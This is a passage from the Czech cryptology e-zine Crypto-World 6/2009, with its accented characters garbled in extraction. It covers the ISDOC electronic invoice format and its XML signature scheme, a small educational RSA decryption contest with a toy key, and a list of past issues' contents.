F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 13: Sešit 6/2009 (452 kB)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

